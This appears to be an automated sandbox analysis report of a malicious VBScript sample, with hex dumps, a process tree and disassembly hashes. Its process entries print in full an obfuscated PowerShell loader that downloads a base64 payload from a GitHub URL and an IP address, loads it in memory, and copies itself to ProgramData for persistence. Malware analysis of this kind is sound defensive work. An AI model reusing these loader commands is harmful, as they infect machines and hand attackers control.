                          2024-10-02 03:26:49 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                          Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                          2024-10-02 03:26:49 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                          Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                          2024-10-02 03:26:49 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                          Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                          2024-10-02 03:26:49 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                          Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                          2024-10-02 03:26:49 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                          Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                          2024-10-02 03:26:49 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                          Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                          2024-10-02 03:26:49 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                          Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:23:26:44
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs"
                          Imagebase:0x7ff64e850000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:1
                          Start time:23:26:45
                          Start date:01/10/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:2
                          Start time:23:26:45
                          Start date:01/10/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:3
                          Start time:23:26:47
                          Start date:01/10/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:23:26:51
                          Start date:01/10/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs"
                          Imagebase:0x7ff751550000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:23:26:51
                          Start date:01/10/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:7
                          Start time:23:27:03
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
                          Imagebase:0x7ff64e850000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:10
                          Start time:23:27:11
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
                          Imagebase:0x7ff64e850000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Executed Functions

                            Function 00007FFD9BA037B5 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2228830679.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ffd9ba00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction ID: 9726ac44c96be3327404be87711fb45009209bbbc61ecf5bfc1889affbc12d5a
                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction Fuzzy Hash: 1001677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5D736E882CB45

                            Executed Functions

                            Function 00007FFD9BAE31D2 Relevance: .4, Instructions: 404COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2209048419.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9bae0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 702398639c56257a36746a109e117c6d12941561c8ce2940c2a711fc2d4a3dbd
                            • Instruction ID: 4c7c8fbb2f99bde6c41aedb251db3cc1863a405f0c834f81b3194b8210cd728b
                            • Opcode Fuzzy Hash: 702398639c56257a36746a109e117c6d12941561c8ce2940c2a711fc2d4a3dbd
                            • Instruction Fuzzy Hash: 5AC14831B0FA8E0FEBA6DB6888649B57BE1EF55314B0901FAD48DC70E3DA58AD05C351
                            Function 00007FFD9BAE031C Relevance: .3, Instructions: 254COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2209048419.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9bae0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0ce55a3341d3043acfd76e6549d0309dea13568e7e48de5338a8694f15e2800b
                            • Instruction ID: 6719290835a377f87d0bb2c546a180435ea7de456e9ce70a0c61e167488b0df3
                            • Opcode Fuzzy Hash: 0ce55a3341d3043acfd76e6549d0309dea13568e7e48de5338a8694f15e2800b
                            • Instruction Fuzzy Hash: 9E711521A0EBCA0FEBB69B7848755747BE0EF66610B0A41FBD08CC71A3D958AD45C351
                            Function 00007FFD9BAE3228 Relevance: .2, Instructions: 242COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2209048419.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9bae0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2aeaa15801538e79ef146b88c2e0123ef19412c022fc3010add38919813266f
                            • Instruction ID: 6150d819ab6614f9cb1f90626b55e70eede1477352076a40d13bd1e630de37ca
                            • Opcode Fuzzy Hash: d2aeaa15801538e79ef146b88c2e0123ef19412c022fc3010add38919813266f
                            • Instruction Fuzzy Hash: FA71E232B0FA8A4FE7A79BA848B45747BD1EF51705B0A00FAD48DCB0E3DD58AD458351
                            Function 00007FFD9BAE077C Relevance: .2, Instructions: 154COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2209048419.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9bae0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4a80bc8153d76131d9399dd80efe3bccffa1f634a7b2aade015274796941d6e
                            • Instruction ID: 5962163db223ed458c35d46ef1cec73b98430828f06d738a2ea614053e0dcdf9
                            • Opcode Fuzzy Hash: a4a80bc8153d76131d9399dd80efe3bccffa1f634a7b2aade015274796941d6e
                            • Instruction Fuzzy Hash: B441E772B0DB4D4FEB689F4CA4522A877E0EF45720F1501BBE449C31A2D725B841C7C5
                            Function 00007FFD9BAE75FA Relevance: .1, Instructions: 144COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2209048419.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9bae0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf2b491e23d332c0fdaad2f0ed8c0c08f0f8b0c135c2c5e8de57e9634decc240
                            • Instruction ID: 0a0e09ca829bb1c63e9f87fb8235f61328b0ba6a017e4e582fa0e651a2d1dd21
                            • Opcode Fuzzy Hash: bf2b491e23d332c0fdaad2f0ed8c0c08f0f8b0c135c2c5e8de57e9634decc240
                            • Instruction Fuzzy Hash: 6441E412F0FA8F0BF7BA97AC047927966C2DF95254B5A00BAD44EC31F3EE69AD454201
                            Function 00007FFD9BAE0912 Relevance: .1, Instructions: 92COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2209048419.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9bae0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb73c1699dd3dcfcb8b3e8b865129b15d255cb5a60c60956e2d8d029e81fc772
                            • Instruction ID: 4b115d40a2c8bcb9cccf89137e40c0f1e44b7b074dd147bfc5511c97b2679579
                            • Opcode Fuzzy Hash: fb73c1699dd3dcfcb8b3e8b865129b15d255cb5a60c60956e2d8d029e81fc772
                            • Instruction Fuzzy Hash: CD31676190E7C64FD3179B7848296507FB1AF17214B0E46EFC089CF1F3DA69684AC362
                            Function 00007FFD9BAE08EB Relevance: .1, Instructions: 90COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2209048419.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9bae0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 10f997e164c1750150d4b173e7fbf979fd2e9df6f835d228213331c1c109b479
                            • Instruction ID: 8f491318dbde2b9f577437964dc0b163d8e0762c39fea8af3ed75b66616436ae
                            • Opcode Fuzzy Hash: 10f997e164c1750150d4b173e7fbf979fd2e9df6f835d228213331c1c109b479
                            • Instruction Fuzzy Hash: 67318B61A0F7C60FE3279778487A6547FA19F13214B1E46EFC089CF1B3D959184AC322
                            Function 00007FFD9BA17AD3 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2208480636.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9ba10000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1202361f5df319f289c51cd5d91b4ce479d55153c36d43864c2025f747394a95
                            • Instruction ID: 918faab1ef22f2683755cf9e28bd90d641f95e18a3e029e901299243a9d232f3
                            • Opcode Fuzzy Hash: 1202361f5df319f289c51cd5d91b4ce479d55153c36d43864c2025f747394a95
                            • Instruction Fuzzy Hash: 0711E26171D5094FE798EB68883877872C2EF89310F4511BDE40EC72E3DD686D018601
                            Function 00007FFD9BA17D2D Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2208480636.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9ba10000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d37fc1b419895d8e4e2fd8253fb9ab1236d3331d007d3a2ec700bc80ef9b72a
                            • Instruction ID: 2ac446597c945f367b1155e18501ed42dac841eaef3b9a7394a2aec3bdab98e5
                            • Opcode Fuzzy Hash: 5d37fc1b419895d8e4e2fd8253fb9ab1236d3331d007d3a2ec700bc80ef9b72a
                            • Instruction Fuzzy Hash: C111B220718A4A4FDB9AFB3884B0AB577D1DF5A304F5504F9D40BCB2EBCC2AAD458741
                            Function 00007FFD9BA17E1D Relevance: .1, Instructions: 52COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2208480636.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9ba10000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7bbbf0ac61915942de9d7e5769de0d8e85331adee6a31b6f078d175efde718e5
                            • Instruction ID: 25ea35f2175c3e27c4f26b7e610264338a6ad4f0d3e0ac527e630e5e57d939a9
                            • Opcode Fuzzy Hash: 7bbbf0ac61915942de9d7e5769de0d8e85331adee6a31b6f078d175efde718e5
                            • Instruction Fuzzy Hash: 4101D6217099894FDBD5EB3844657A8B7A2EF8A244F1901F6C40CC72E6CD246D818741
                            Function 00007FFD9BA15CA5 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
